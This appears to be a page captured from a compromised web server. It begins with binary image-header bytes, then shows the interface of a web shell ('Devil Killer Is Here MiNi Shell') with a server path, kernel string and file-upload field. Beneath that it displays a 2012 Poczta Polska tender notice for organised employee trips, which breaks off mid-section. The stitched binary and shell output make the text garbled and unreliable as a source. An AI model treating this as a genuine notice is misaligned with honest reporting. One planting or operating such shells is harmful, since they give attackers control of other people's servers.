JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120420/127364-N-2012.html

<p class="kh_header"><b>Kraków: Zorganizowanie wycieczek turystycznych dla pracowników</b><br>
<b>Numer ogłoszenia: 127364 - 2012; data zamieszczenia: 20.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie , ul. Westerplatte 20, 31-045 Kraków, woj. małopolskie, tel. 124222153, faks 124222153; 124229033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wycieczek turystycznych dla pracowników.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja wycieczek turystyczno - krajoznawczych krajowych oraz zagranicznych.  Postępowanie prowadzone jest z podziałem na 5 części.
Część nr 1: zorganizowanie 6 - dniowej wycieczki turystycznej do Paryża + Zamki nad Loarą dla 98 osób + 2 miejsca gratis
Część nr 2: zorganizowanie 3 - dniowej wycieczki turystycznej do Karpacza + Praga dla 98 osób + 2 miejsca gratis
Część nr 3: zorganizowanie 3 - dniowej wycieczki turystycznej do Warszawy dla 98 osób + 2 miejsca gratis.
Część nr 4: zorganizowanie 8 - dniowej wycieczki turystycznej do Chorwacji dla 90 osób + 2 miejsca gratis.
Część nr 5: zorganizowanie 2 - dniowej wycieczki turystycznej Tarnowskie Góry - Koszęcin dla 108 osób + 2 miejsca gratis..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości:
Część nr 1 -  3 000,00 zł (słownie: trzy tysiące złotych 00/100)
Część nr 2 -  1 600,00 zł (słownie: jeden tysiąc sześćset złotych 00/100)
Część nr 3 -  1 200,00 zł (słownie: jeden tysiąc dwieście złotych 00/100)
Część nr 4 -  3 000,00 zł (słownie: trzy tysiące złotych 00/100)
Część nr 5 -  1 000,00 zł (słownie: jeden tysiąc złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez wykonawcę warunku, o którym mowa powyżej Wykonawca jest zobowiązany przedstawić:Aktualny wpis do Centralnej Ewidencji Organizatorów Turystyki i Pośredników Turystycznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku zamawiający uzna wykazanie, iż wykonawca wykonał należycie w powyższym okresie: 
-	część nr 1, część nr 2, część nr 4: min. 3 umowy na organizację wycieczek turystycznych zagranicznych dla osób dorosłych - minimum 50 osób każda umowa, 
-	część nr 3, część nr 5: min. 3 umowy na organizację wycieczek turystycznych krajowych dla osób dorosłych - minimum 50 osób każda umowa,
W przypadku złożenia oferty na części dotyczące wycieczek krajowych i części dotyczące wycieczek zagranicznych należy wykazać się doświadczeniem w realizacji co najmniej 3 usług zorganizowania wycieczek krajowych i 3 usług zorganizowania wycieczek zagranicznych.
W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, jest zobowiązany udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. W tym przypadku wymagane jest, aby inny podmiot brał udział w wykonywaniu części zamówienia. Należy wskazać jaką część zamówienia będzie wykonywał inny podmiot, na wiedzy i doświadczeniu którego Wykonawca będzie polegał.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku Zamawiający uzna posiadanie: 
Opłaconej polisy OC na podstawie Rozporządzenia Ministra Finansów z dnia 21.12.2010 r. w sprawie obowiązkowego ubezpieczenia na rzecz klientów w związku z działalnością wykonywaną przez organizatorów turystyki i pośredników turystycznych 
lub gwarancji ubezpieczeniowej lub bankowej na podstawie Rozporządzenia Ministra Finansów z dnia 16.12.2010r. w sprawie minimalnej wysokości sumy gwarancji bankowej lub ubezpieczeniowej wymaganej w związku z działalnością wykonywaną przez organizatorów turystyki i pośredników turystycznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Podpisany formularz oferty - zgodny z załącznikiem nr 1.
2. Zamawiający żąda, aby Wykonawca do oferty dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do centralnej ewidencji i informacji o działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy. Wymagane dokumenty można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
3. Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonego dokumentu, o którym mowa w ust. 4.2, do oferty należy dołączyć także pełnomocnictwo w oryginale  lub w postaci kopii poświadczonej notarialnie.
4. Dowód wniesienia wadium - jeżeli wadium wniesione będzie przelewem; jeżeli wadium wniesione będzie w formie gwarancji lub poręczenia, do oferty należy załączyć potwierdzoną kopię poręczeń lub gwarancji oraz do koperty oryginał luzem.
5. Program autorski - sporządzony w oparciu o wskazania pkt 3 cz. I SIWZ Opis przedmiotu zamówienia  osobno dla każdej części zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Atrakcyjność programu - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość rezygnacji Zamawiającego z realizacji przedmiotu zamówienia maksymalnie do 20% z ilości uczestników poszczególnych wycieczek, a tym samym zmniejszenia ceny, o której mowa w § 5 ust. 2 wzoru umowy - zał. nr 3 do siwz, gdy Zamawiający powiadomi Wykonawcę o tym fakcie w formie pisemnej nie później niż na 3 dni przed rozpoczęciem usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.poczta-polska.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny  w Krakowie ul. Westerplatte 20, 31-045 Kraków pok. 408.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2012 godzina 11:00, miejsce: Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny  w Krakowie ul. Westerplatte 20, 31-045 Kraków pok. 408.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 07.06.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do kontaktu z wykonawcami są:
Sprawy merytoryczne: część nr 1 - nr 3: Elżbieta Wnęk - Boroń - tel. 12 619-05-17
 część nr 4 - nr 5: Alina Żelasko - tel. 18 442-28-34
Sprawy proceduralne: Magdalena Kurdziel - tel. 12 422-21-53
Koszt przesłania SIWZ wynosi: 2,64 pln (koszt wydruku) + koszty przesłania (zgodnie z cennikiem PP S.A.).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie 6 - dniowej wycieczki turystycznej do Paryża + Zamki nad Loarą..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1: zorganizowanie 6 - dniowej wycieczki turystycznej do Paryża + Zamki nad Loarą.
Termin:  05.06.2012r. - 10.06.2012r. 
Ilość uczestników: 98 osób dorosłych płatnych + 2 miejsca gratis (po 1 miejscu w autokarze).
Standard obiektu:
3 noclegi - hotel, pokoje 2 osobowe z łazienkami. Dopuszcza się sieciowe hotele typu Premiere Class położone na obrzeżach miasta Paryż. W ofercie Wykonawca opisze proponowany hotel, jego otoczenie i położenie, wyposażenie pokoi, inne typu restauracja, bar itp. Mile widziana prezentacja fotograficzna.
Wyżywienie: 
-	3 x śniadania w restauracji hotelowej (wzmocniony bufet francuski)
-	3 x obiadokolacje w Paryżu - dopuszcza się restauracje typu self service 
-	1 x obiadokolacja przed wyjazdem w drogę powrotną - dopuszcza się restauracje typu self service
-	1 x menu podczas imprezy integracyjnej
Transport:  2 autokary  wysokopokładowe klasy LUX (max. 5 letnie - zastrzega się możliwość kontroli dokumentów w tym zakresie) zapewniające miejsca siedzące dla wszystkich uczestników (50 osób/ autokar) pilota i drugiego kierowcy, przewodnika, wyposażone w klimatyzację, wc, dvd. Min. 2 kierowców na 1 autokar. Wykonawca zobowiązuje się do zapewnienia autokaru zastępczego  na wypadek awarii.
Ubezpieczenie: NNW, KL, bagaż
Świadczenia dodatkowe: opłaty: drogowe, parkingowe, autostradowe, ewentualne taksy klimatyczne, obsługa pilota na trasie (1 pilot na 1 autokar posługujący się językiem francuskim lub angielskim), obsługa lokalnego (polskojęzycznego) przewodnika w Paryżu (min. 5 godzin - 1 przewodnik/ autokar).
Program: 
Wykonawca opisze program autorski wycieczki, który powinien zawierać opis poszczególnych punktów programu, kolejność zwiedzania - ze wskazaniem czy z udziałem lokalnego przewodnika (ilość godzin/ minut), opis w zakresie wyżywienia (proponowanego menu), dodatkowych atrakcji typu impreza integracyjna (wraz z menu).
Bilety wstępu do zwiedzanych obiektów płatne osobno przez uczestników wycieczki. 
W ofercie Wykonawca poda orientacyjny koszt za wstępy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 05.06.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zorganizowanie 3 - dniowej wycieczki turystycznej do Karpacza + Praga..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 2 - charakterystyka przedmiotu zamówienia.
Termin:  21.09.2012r. - 23.09.2012r. 
Ilość uczestników: 98 osób dorosłych płatnych + 2 miejsca gratis (po 1 miejscu w autokarze).
Standard obiektu:
2 noclegi - hotel *** w Karpaczu, pokoje 2 osobowe z łazienkami. W ofercie Wykonawca opisze proponowany hotel, jego otoczenie i położenie, wielkość pokoi i wyposażenia, inne typu: restauracja, bar, basen, siłownia itp. Mile widziana prezentacja fotograficzna.
Wyżywienie: 
-	2 x śniadania w restauracji hotelowej ( bufet szwedzki)
-	1 x obiadokolacja w restauracji hotelowej
-	1 x menu podczas imprezy integracyjnej
Transport:  2 autokary  wysokopokładowe klasy LUX (max. 5 letnie - zastrzega się możliwość kontroli dokumentów w tym zakresie) zapewniające miejsca siedzące dla wszystkich uczestników (50 osób/ autokar), pilota, wyposażone w klimatyzację, wc, dvd. Wykonawca zobowiązuje się do zapewnienia autokaru zastępczego  na wypadek awarii.
Ubezpieczenie: NNW, KL
Świadczenia dodatkowe: opłaty: drogowe, parkingowe, autostradowe, ewentualne taksy klimatyczne, obsługa pilota na trasie (1 pilot na 1 autokar), obsługa lokalnego (polskojęzycznego) przewodnika w Pradze (min. 4 godziny 1 przewodnik/ autokar).
Program: 
Wykonawca opisze program autorski wycieczki, który powinien zawierać opis poszczególnych punktów programu, kolejność zwiedzania - ze wskazaniem czy z udziałem lokalnego przewodnika (ilość godzin/ minut), opis w zakresie wyżywienia (proponowane menu), z uwzględnieniem imprezy integracyjnej przy muzyce mechanicznej oraz imprezy eventowej. 
Bilety wstępu do zwiedzanych obiektów płatne osobno przez uczestników wycieczki. 
W ofercie Wykonawca poda orientacyjny koszt za wstępy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Atrakcyjność programu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie 3 - dniowej wycieczki turystycznej do Warszawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 3 - charakterystyka przedmiotu zamówienia.
Termin:  28.09.2012r. - 30.09.2012r. 
Ilość uczestników: 98 osób dorosłych płatnych + 2 miejsca gratis (po 1 miejscu w autokarze).
Standard obiektu:
2 noclegi - hotel *** w centrum Warszawy, pokoje 2 osobowe z łazienkami. W ofercie Wykonawca opisze proponowany hotel, jego otoczenie i położenie, wielkość pokoi i wyposażenia, inne typu: restauracja, bar, basen, siłownia itp.. Mile widziana prezentacja fotograficzna.
Wyżywienie: 
-	2 x śniadania w restauracji hotelowej ( bufet szwedzki)
-	2 x obiadokolacja serwowana w restauracji hotelowej
-	1 x menu podczas imprezy integracyjnej
Transport:  2 autokary  wysokopokładowe klasy LUX (max. 5 letnie - zastrzega się możliwość kontroli dokumentów w tym zakresie) zapewniające miejsca siedzące dla wszystkich uczestników (50 osób/ autokar) pilota, wyposażone w klimatyzację, wc, dvd. Wykonawca zobowiązuje się do zapewnienia autokaru zastępczego  na wypadek awarii.
Ubezpieczenie: NNW, KL
Świadczenia dodatkowe: opłaty: drogowe, parkingowe, autostradowe, ewentualne taksy klimatyczne, obsługa pilota na trasie (1 pilot na 1 autokar), obsługa przewodnika miejskiego w Warszawie (5 -7 godzin/ przez min. 2 dni, 1 przewodnik/ autokar).
Program: 
Wykonawca opisze program autorski wycieczki, który powinien zawierać opis poszczególnych punktów programu, kolejność zwiedzania - ze wskazaniem czy z udziałem lokalnego przewodnika (ilość godzin/ minut), opis w zakresie wyżywienia (proponowane menu), z uwzględnieniem imprezy integracyjnej przy muzyce mechanicznej. 
Bilety wstępu do zwiedzanych obiektów płatne osobno przez uczestników wycieczki. 
W ofercie Wykonawca poda orientacyjny koszt za wstępy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Atrakcyjność programu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zorganizowanie 8 - dniowej wycieczki turystycznej do Chorwacji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 4 - charakterystyka przedmiotu zamówienia.
Miejscowość: Chorwacja - Istria- okolice Umagu 
Termin:  15.09.2012r - 22.09.2012r. 
Zakwaterowanie:
Noclegi tranzytowe: hotel 3*, pokoje 2 osobowe z łazienkami, 
Noclegi podczas pobytu: okolice Umagu - hotel 4*, pokoje 2 osobowe z klimatyzacją, restauracje, bary, zaplecze sportowo-rekreacyjne na terenie obiektu. Dostęp do kąpieliska położonego w odległości nie większej niż 50m od obiektu podczas wypoczynku w Chorwacji (najkrótsza dostępna droga dojścia). Mile widziana prezentacja fotograficzna. Przedmiotowy opis wykonawca dołączy do oferty. Wykonawca opisze miejscowości, w których znajdują się proponowane obiekty, ich otoczenie i położenie.
Wyżywienie: 
- 2 śniadania i 2 obiadokolacje na trasie przejazdu, 
- 5 dni wyżywienie opcja all inclusive,
- 1 impreza integracyjna wraz z konsumpcją. 
Propozycje menu wykonawca szczegółowo opisze w programie autorskim.
Transport: 2 autokary  wysokopokładowe min. 49 osobowe klasy LUX (max. 5 letni - zastrzega się możliwość kontroli dokumentów w tym zakresie) wyposażone w klimatyzację, wc, dvd. 
Min. 2 kierowców na 1 autokar. Wykonawca zobowiązuje się do zapewnienia autokaru zastępczego  na wypadek awarii. Wyjazd/Przyjazd Nowy Sącz. Zapewnienie podczas przejazdu przerw co 2,5 godziny na parkingu dla uczestników wycieczki.
Program wycieczki: Wykonawca opisze program autorski wycieczki, który powinien zawierać opis poszczególnych punktów programu, kolejność zwiedzania - ze wskazaniem czy z udziałem lokalnego przewodnika (ilość godzin/ minut), opis w zakresie wyżywienia (forma bufet czy serwowane oraz proponowanego menu), dodatkowych atrakcji typu impreza integracyjna, rejs statkiem itp. W programie należy uwzględnić 2 dniowy wypoczynek stacjonarnie w miejscu pobytu tzw. plażowanie oraz 2 noclegi tranzytowe w tym 1 w Słowenii - Alpy Julijskie (w trakcie przejazdu) i zwiedzanie obiektów sportowych w Planicy. Kosztów ewentualnych wycieczek fakultatywnych nie należy wliczać w cenę oferty.
Ubezpieczenie: KL, NNW + bagaż
Inne: opłata za klimatyzację, opłaty parkingowe, drogowe, autostradowe, obsługa pilota (1 pilot na 1 autokar posługujący się językiem chorwackim lub angielskim)oraz lokalnego polskojęzycznego przewodnika na wycieczkach krajoznawczych po Chorwacji - 3 - 5 godzin dziennie podczas 3 dniowego zwiedzania (1 przewodnik/ autokar).
Ilość uczestników: 90 osób + 2 miejsca gratis (po 1 miejscu w autokarze).
Bilety wstępu do zwiedzanych obiektów płatne osobno przez uczestników wycieczki. 
W ofercie Wykonawca poda orientacyjny koszt za wstępy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Atrakcyjność programu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zorganizowanie 2 - dniowej wycieczki turystycznej Tarnowskie Góry - Koszęcin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 5 - charakterystyka przedmiotu zamówienia.
Miejscowość: Tarnowskie Góry - Koszęcin
Termin:  25.08.2012 - 26.08.2012  oraz  01.09.2012 - 02.09.2012
w jednym terminie około 54 osoby + 1 miejsce gratis
Zakwaterowanie:   Tarnowskie Góry - hotel **, pokoje 2 osobowe z łazienkami, restauracja w obiekcie,
